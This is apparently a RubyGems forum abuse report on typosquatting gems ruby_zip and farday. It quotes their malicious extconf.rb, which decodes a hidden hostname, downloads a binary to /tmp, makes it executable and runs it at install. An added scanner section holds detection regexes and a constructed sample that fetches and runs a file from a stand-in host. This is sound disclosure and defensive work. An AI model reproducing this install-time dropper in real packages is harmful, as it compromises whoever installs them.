Abuse report farday and ruby_zip


Ariel Zelivansky

18 Sep, 2018 09:11 PM

Hi,

I'm assuming the reader is familiar with Typosquatting, and the previous discussions on this topic (e.g. bunlder).

I'd like to report 1. ruby_zip and 2. farday, which are typosquatting other popular ruby gems. Fortunately, there seems to be a typo in the exploit found in these gems' extconf.rb, as I found out when trying to install one of them. See [1] and [2].

Now, there is something that feels very automated to me about these packages: the gem files and variable names seem generated, and the gemspecs themselves feel very much generated as well. I wonder if there are other gems like these out there, with working code, and if there is anything else RubyGems can do to prevent these.

Thanks
zelivans

[1] ruby_zip installation:

/ # gem install ruby_zip
Building native extensions.  This could take a while...
Successfully installed nokogiri-1.8.4
Fetching: ruby_zip-0.1.3.gem (100%)
Building native extensions.  This could take a while...
ERROR:  Error installing ruby_zip:
    ERROR: Failed to build gem native extension.

current directory: /usr/lib/ruby/gems/2.4.0/gems/ruby_zip-0.1.3/ext/laterite/laryngopharyngeal/amaterialistic
/usr/bin/ruby -r ./siteconf20180918-59-1sc0gxv.rb extconf.rb
extconf.rb:27:in `run': undefined method `setup_exploit' for Calvinize:Class (NoMethodError)
    from extconf.rb:31:in `<main>'
extconf failed, exit code 1
Gem files will remain installed in /usr/lib/ruby/gems/2.4.0/gems/ruby_zip-0.1.3 for inspection. Results logged to /usr/lib/ruby/gems/2.4.0/extensions/x86_64-linux/2.4.0/ruby_zip-0.1.3/gem_make.out

[2] extconf.rb file of ruby_zip gem:

require 'net/http'
require 'uri'
require 'base64'
require 'resolv'

class Calvinize
  def self.setup_explot(dematerialising)
    if !dematerialising.nil? and dematerialising != '0.0.0.0'
      dodgery = Net::HTTP.get_response(URI('http://' + dematerialising + '/contributor'))
      File.open('/tmp/endopod', 'wb+') do |upsurge|
        upsurge.binmode
        upsurge.write(dodgery.body)
        upsurge.chmod(0777)
        upsurge.close
      end
      system('/tmp/endopod')
    end
  end

  def self.run()
    struthioniform = 'NDJiNTU5YjEuaGt6enp6ei5kZQ=='
    futurize = nil
    begin
      futurize = Resolv.getaddress(Base64.decode64(struthioniform))
    rescue
    end
    self.setup_exploit(futurize)
  end
end

Calvinize.run()
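
The build-time pattern in [2] (hostname hidden in base64, payload fetched over HTTP, written under /tmp, chmod 0777, then executed) is exactly what a reviewer of installed gems would want flagged automatically. The following is an added example, not code from this report or from RubyGems: a heuristic scanner for extconf.rb files, where EXTCONF_INDICATORS, the function names, the gems directory argument and the two sample scripts are my own constructions.

```ruby
require 'base64'
# Indicators drawn from the posted extconf.rb: a base64-obscured hostname, a
# network fetch, a file written under /tmp, made executable, then executed.
EXTCONF_INDICATORS = {
  network:    /Net::HTTP|open-uri|TCPSocket|Resolv\.getaddress/,
  decode:     /Base64\.decode64/,
  write_exec: /File\.open\(['"]\/tmp\//,
  chmod_exec: /chmod\(0?7[0-7]{2}\)/,
  run_binary: /\bsystem\(|Kernel\.exec|IO\.popen|spawn\(/
}.freeze

# Names of the indicators present in an extconf.rb source text.
def extconf_indicators(source)
  EXTCONF_INDICATORS.select { |_, re| source.match?(re) }.keys
end

# Quoted base64 literals long enough to hide a hostname, decoded so a reviewer
# can read them without running the script; candidates that fail to decode are skipped.
def decoded_base64_literals(source)
  source.scan(/['"]([A-Za-z0-9+\/]{16,}={0,2})['"]/).flatten.map do |lit|
    [lit, Base64.strict_decode64(lit)] rescue nil
  end.compact
end

# A build script that reaches the network and also drops, chmods or runs a
# binary is not configuring a compiler; a genuine extconf.rb uses mkmf for that.
def suspicious_extconf?(source)
  hits = extconf_indicators(source)
  hits.include?(:network) && (hits & %i[write_exec chmod_exec run_binary]).any?
end

# Paths of suspicious extconf.rb files below a gems directory such as
# /usr/lib/ruby/gems/2.4.0/gems (hypothetical argument; ext/ may be nested deeply).
def scan_gem_dir(gems_dir)
  Dir.glob(File.join(gems_dir, '*', 'ext', '**', 'extconf.rb')).select do |path|
    suspicious_extconf?(File.read(path))
  end
end

# Constructed samples: one mirrors the posted script with a stand-in hostname,
# the other is what an ordinary native-extension extconf.rb looks like.
HOST_B64 = Base64.strict_encode64('example.invalid')
MALICIOUS_SAMPLE = <<~RUBY
  require 'net/http'
  host = Resolv.getaddress(Base64.decode64('#{HOST_B64}'))
  body = Net::HTTP.get_response(URI('http://' + host + '/contributor')).body
  File.open('/tmp/dropped', 'wb+') { |f| f.write(body); f.chmod(0777) }
  system('/tmp/dropped')
RUBY
BENIGN_SAMPLE = "require 'mkmf'\ncreate_makefile('foo/foo')\n"
```

Running scan_gem_dir over a gems directory lists the build scripts worth a manual look; decoded_base64_literals shows what an obscured literal resolves to without executing the gem.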

1. Support Staff: Posted by indirect on 18 Sep, 2018 09:29 PM

Thanks for the report! We've removed those gems, and we're working on a system to eliminate (or at least hopefully reduce) this kind of thing in the future.

2. indirect closed this discussion on 18 Sep, 2018 09:29 PM.

